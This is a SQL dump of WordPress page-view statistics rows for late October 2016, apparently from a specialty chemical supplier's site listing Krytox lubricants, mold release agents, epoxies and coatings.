INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-29', 2, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant', '2016-10-29', 2, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-29', 2, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-29', 2, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease', '2016-10-29', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-29', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive', '2016-10-29', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-29', 3, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication', '2016-10-29', 2, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-29', 2, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants', '2016-10-29', 2, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-29', 3, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation', '2016-10-29', 2, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-29', 2, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases', '2016-10-29', 2, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-29', 2, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq', '2016-10-29', 2, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-29', 2, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding', '2016-10-29', 2, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-29', 2, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants', '2016-10-29', 2, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-29', 2, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life', '2016-10-29', 2, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-29', 2, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness', '2016-10-29', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-29', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds', '2016-10-29', 1, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-29', 2, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-242l-quik-freeze-ultra/shutterstock_444780952/', '2016-10-29', 1, 2789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-242l-quik-freeze-ultra/shutterstock_444780952/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 2789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-10-29', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-10-29', 1, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-29', 6, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-mold-release-issues/', '2016-10-29', 1, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8904/', '2016-10-29', 1, 878); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472s/', '2016-10-29', 1, 738); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-29', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-29', 1, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-29', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/vazo-64-2/', '2016-10-29', 1, 1600); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/vazo-64-2/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 1600); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-sg/', '2016-10-29', 1, 1431); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/', '2016-10-29', 1, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-725727/?wc-ajax=get_refreshed_fragments', '2016-10-29', 1, 1697); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-30', 154, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-30', 37, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-30', 6, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-30', 2, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-30', 5, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-30', 27, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-30', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-30', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-30', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-30', 6, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-30', 3, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-30', 3, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-226-fg/', '2016-10-30', 1, 2741); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-226-fg/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 2741); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-30', 4, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-30', 2, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-30', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?print=y', '2016-10-30', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson', '2016-10-30', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-30', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-30', 2, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-30', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-30', 1, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-30', 1, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-30', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-30', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-30', 4, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents', '2016-10-30', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-30', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-30', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating', '2016-10-30', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-30', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant', '2016-10-30', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-30', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-30', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease', '2016-10-30', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-30', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive', '2016-10-30', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-30', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication', '2016-10-30', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-30', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants', '2016-10-30', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-30', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation', '2016-10-30', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-30', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases', '2016-10-30', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-30', 2, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq', '2016-10-30', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-30', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding', '2016-10-30', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-30', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants', '2016-10-30', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-30', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life', '2016-10-30', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-30', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness', '2016-10-30', 1, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-30', 1, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant', '2016-10-30', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-30', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-30', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-10-30', 2, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-30', 9, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-30', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-30', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-30', 3, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/', '2016-10-30', 1, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-30', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-30', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/hexion-epikure-3140-curing-agent/', '2016-10-30', 1, 1462); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-30', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-3522-w-60/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 1031); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-30', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-30', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ac/', '2016-10-30', 1, 582); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/', '2016-10-30', 1, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-10-30', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/?wc-ajax=get_refreshed_fragments', '2016-10-30', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-31', 90, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-31', 4, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-31', 392, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-31', 19, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-31', 10, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-31', 5, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-31', 4, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-31', 4, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-31', 16, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-31', 7, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-31', 59, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-31', 11, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-31', 7, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent', '2016-10-31', 1, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-31', 7, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-31', 6, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-31', 7, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-31', 48, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-31', 53, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-31', 7, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-31', 7, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-31', 19, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support', '2016-10-31', 5, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-31', 6, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-31', 4, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-31', 31, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson', '2016-10-31', 5, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-31', 8, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings', '2016-10-31', 1, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-31', 2, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating', '2016-10-31', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/', '2016-10-31', 5, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals', '2016-10-31', 2, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-31', 55, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds', '2016-10-31', 4, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-31', 11, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-31', 12, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-31', 22, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/ms-143te-ptfe-release-agent/', '2016-10-31', 1, 1443); 
INSERT INTO `wp_statistics_pages` VALUES ('/ms-143xd-ptfe-release-agent/', '2016-10-31', 1, 1444); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-31', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-31', 12, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/', '2016-10-31', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-31', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/opteon-suprion-2/', '2016-10-31', 1, 1347); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-31', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-10-31', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-31', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-10-31', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-31', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-31', 1, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-31', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/', '2016-10-31', 2, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-10-31', 6, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-31', 3, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/vazo-67-new/', '2016-10-31', 1, 1352); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-31', 17, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/', '2016-10-31', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-10-31', 4, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/', '2016-10-31', 1, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143ay/', '2016-10-31', 1, 580); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-31', 11, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/', '2016-10-31', 1, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-31', 2, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-31', 3, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-31', 5, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-31', 4, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-31', 5, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-31', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n', '2016-10-31', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-31', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coating-mil-spec/', '2016-10-31', 1, 637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coating-mil-spec/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-31', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-227-fg/', '2016-10-31', 1, 2746); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-227-fg/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 2746); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-31', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/', '2016-10-31', 2, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-10-31', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1002f/', '2016-10-31', 1, 937); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1002f/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 937); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-31', 2, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-31', 5, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-765767/', '2016-10-31', 1, 1710); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-765767/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 1710); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-31', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-31', 3, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-10-31', 4, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/', '2016-10-31', 4, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-severe-service-grease/', '2016-10-31', 2, 1104); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250ac/', '2016-10-31', 1, 647); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-250ac/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 647); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1007f/', '2016-10-31', 1, 941); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1007f/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 941); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-31', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-31', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-31', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/', '2016-10-31', 1, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/?wc-ajax=get_refreshed_fragments', '2016-10-31', 1, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mil-spec-urethane-conformal-coating/', '2016-10-31', 1, 190); 
